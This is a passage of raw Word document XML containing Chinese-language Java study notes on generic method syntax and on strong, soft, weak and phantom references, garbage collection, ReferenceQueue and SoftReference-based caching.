          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>public, static final, abstract</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
          <w:color w:val="454545"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
          <w:color w:val="454545"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>等</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="454545"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>，返回值</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
          <w:color w:val="454545"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>声明</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="454545"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>之前。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00797752" w:rsidRPr="00797752" w:rsidRDefault="00797752" w:rsidP="00125738">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FEFEFE"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="180" w:afterAutospacing="0"/>
        <w:ind w:firstLine="238"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="454545"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
          <w:color w:val="454545"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>然后</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="454545"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>，和泛型</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
          <w:color w:val="454545"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>类</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="454545"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>一样，可以声明多个泛型，用逗号隔开。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B93C9E" w:rsidRDefault="00B93C9E" w:rsidP="00B93C9E">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>1.1.2</w:t>
      </w:r>
      <w:r w:rsidR="00563FFB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidR="00C25268">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidR="00C25268">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>强引用、软应用、弱引用</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E10795" w:rsidRDefault="00E10795" w:rsidP="00E10795">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>控制</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Java</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>对象的生命周期</w:t>
      </w:r>
      <w:r w:rsidR="007C2B8A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
      <w:r w:rsidR="007C2B8A" w:rsidRPr="00D561F1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r w:rsidR="007C2B8A" w:rsidRPr="00D561F1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>种级别由高到低依次为：</w:t>
      </w:r>
      <w:r w:rsidR="007C2B8A" w:rsidRPr="00207487">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>强引用、软引用、弱引用和虚引用</w:t>
      </w:r>
      <w:r w:rsidR="007C2B8A" w:rsidRPr="00D561F1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00513432" w:rsidRDefault="00513432" w:rsidP="00E10795">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="3752850" cy="2211070"/>
            <wp:effectExtent l="19050" t="0" r="0" b="0"/>
            <wp:docPr id="203" name="图片 3" descr="http://up.2cto.com/2012/0709/201207090914168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up.2cto.com/2012/0709/20120709091416886.jpg"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId52" cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3752850" cy="2211070"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00513432" w:rsidRDefault="00513432" w:rsidP="00E10795"/>
    <w:p w:rsidR="00513432" w:rsidRDefault="00513432" w:rsidP="00513432">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="86" w:afterAutospacing="0" w:line="301" w:lineRule="atLeast"/>
        <w:ind w:firstLine="480"/>
        <w:rPr>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>1)强引用（StrongReference）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:br/>
        <w:t>    强引用是使用最普遍的引用。如果一个对象具有强引用，那垃圾回收器绝不会回收它。当内存空间不足，Java</w:t>
      </w:r>
      <w:hyperlink r:id="rId53" w:tgtFrame="_blank" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="a6"/>
            <w:rFonts w:hint="eastAsia"/>
            <w:color w:val="333333"/>
            <w:sz w:val="15"/>
            <w:szCs w:val="15"/>
          </w:rPr>
          <w:t>虚拟机</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>宁愿抛出OutOfMemoryError错误，使程序异常终止，也不会靠随意回收具有强引用的对象来解决内存不足的问题。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidR="0048522F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>2)软引用（SoftReference）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:br/>
        <w:t>    如果一个对象只具有软引用，则内存空间足够，垃圾回收器就不会回收它；如果内存空间不足了，就会回收这些对象的内存。只要垃圾回收器没有回收它，该对象就可以被程序使用。软引用可用来实现内存敏感的高速缓存（下文给出示例）。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:br/>
        <w:t>    软引用可以和一个引用队列（ReferenceQueue）联合使用，如果软引用所引用的对象被垃圾回收器回收，Java虚拟机就会把这个软引用加入到与之关联的引用队列中。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00513432" w:rsidRDefault="00513432" w:rsidP="00513432">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="86" w:afterAutospacing="0" w:line="301" w:lineRule="atLeast"/>
        <w:ind w:firstLine="480"/>
        <w:rPr>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>3) 弱引用（WeakReference）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:br/>
        <w:t>    弱引用与软引用的区别在于：弱引用的对象拥有更短暂的生命周期。</w:t>
      </w:r>
      <w:r w:rsidRPr="00552BDA">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>在垃圾回收器线程扫描它所管辖的内存区域的过程中，一旦发现了只具有弱引用的对象，不管当前内存空间足够与否，都会回收它的内存</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>。不过，由于垃圾回收器是一个优先级很低的线程，因此不一定会很快发现那些只具有弱引用的对象。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:br/>
        <w:t>    弱引用可以和一个引用队列（ReferenceQueue）联合使用，如果弱引用所引用的对象被垃圾回收，Java虚拟机就会把这个弱引用加入到与之关联的引用队列中。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00513432" w:rsidRDefault="00513432" w:rsidP="00513432">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="86" w:afterAutospacing="0" w:line="301" w:lineRule="atLeast"/>
        <w:ind w:firstLine="480"/>
        <w:rPr>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t> 4)虚引用（PhantomReference）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:br/>
        <w:t>    “虚引用”顾名思义，就是形同虚设，与其他几种引用都不同，虚引用并不会决定对象的生命周期。如果一个对象仅持</w:t>
      </w:r>
      <w:r w:rsidR="00552BDA">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>有虚引用，那么它就和没有任何引用一样，</w:t>
      </w:r>
      <w:r w:rsidRPr="00552BDA">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>在任何时候都可能被垃圾回收器回收</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>虚引用主要用来跟踪对象被垃圾回收器回收的活动。虚引用与软引用和弱引用的一个区别在于：虚引用必须和引用队列（ReferenceQueue）联合使用。当垃圾回收器准备回收一个对象时，如果发现它还有虚引用，就会在回收对象的内存之前，把这个虚引用加入到与之 关联的引用队列中。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:br/>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:br/>
        <w:t>    程序可以通过判断引用队列中是否已经加入了虚引用，来了解被引用的对象是否将要被垃圾回收。如果程序发现某个虚引用已经被加入到引用队列，那么就可以在所引用的对象的内存被回收之前采取必要的行动</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00513432" w:rsidRDefault="00DA54D7" w:rsidP="00E10795">
      <w:hyperlink r:id="rId54" w:history="1">
        <w:r w:rsidR="00566207" w:rsidRPr="009E3A22">
          <w:rPr>
            <w:rStyle w:val="a6"/>
          </w:rPr>
          <w:t>http://www.2cto.com/kf/201207/139522.html</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00566207" w:rsidRDefault="005735E7" w:rsidP="00566207">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="226" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00566207">
        <w:rPr>
          <w:rFonts w:cs="Arial" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>了解了</w:t>
      </w:r>
      <w:r w:rsidR="00566207">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>GC</w:t>
      </w:r>
      <w:r w:rsidR="00566207">
        <w:rPr>
          <w:rFonts w:cs="Arial" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>机制、引用机制，并配合上</w:t>
      </w:r>
      <w:r w:rsidR="00566207">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>ReferenceQueue</w:t>
      </w:r>
      <w:r w:rsidR="00566207">
        <w:rPr>
          <w:rFonts w:cs="Arial" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>，我们就可以实现一些防止内存溢出的复杂数据类型。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00566207" w:rsidRDefault="00566207" w:rsidP="00566207">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="226" w:lineRule="atLeast"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>例如，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>SoftReference</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>具有构建</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Cache</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>系统的特质，因此我们可以结合哈希表实现一个简单的缓存系统。这样既能保证能够尽可能多的缓存信息，又可以保证</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Java</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>虚拟机不会因为内存泄露而抛出</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>OutOfMemoryError</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>。这种缓存机制特别适合于内存对象生命周期长，且生成内存对象的耗时比较长的情况，例如缓存列表封面图片等。对于一些生命周期较长，但是生成内存对象开销不大的情况，使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>WeakReference</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>能够达到更好的内存管理的效果。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C334C9" w:rsidRDefault="00C334C9" w:rsidP="00C334C9">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="315" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>强引用</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C334C9" w:rsidRDefault="00C334C9" w:rsidP="00C334C9">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="315" w:lineRule="atLeast"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>在此之前我们介绍的内容中所使用的引用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>都是强引用，这是使用最普遍的引用。如果一个对象具有强引用，那就类似于必不可少的生活用品，垃圾回收器绝不会回收它。当内存空</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>间不足，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Java</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>虚拟机宁愿抛出</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>OutOfMemoryError</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>错误，使程序异常终止，也不会靠随意回收具有强引用的对象来解决内存不足问题。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C334C9" w:rsidRDefault="00C334C9" w:rsidP="00C334C9">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="315" w:lineRule="atLeast"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>软引用（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
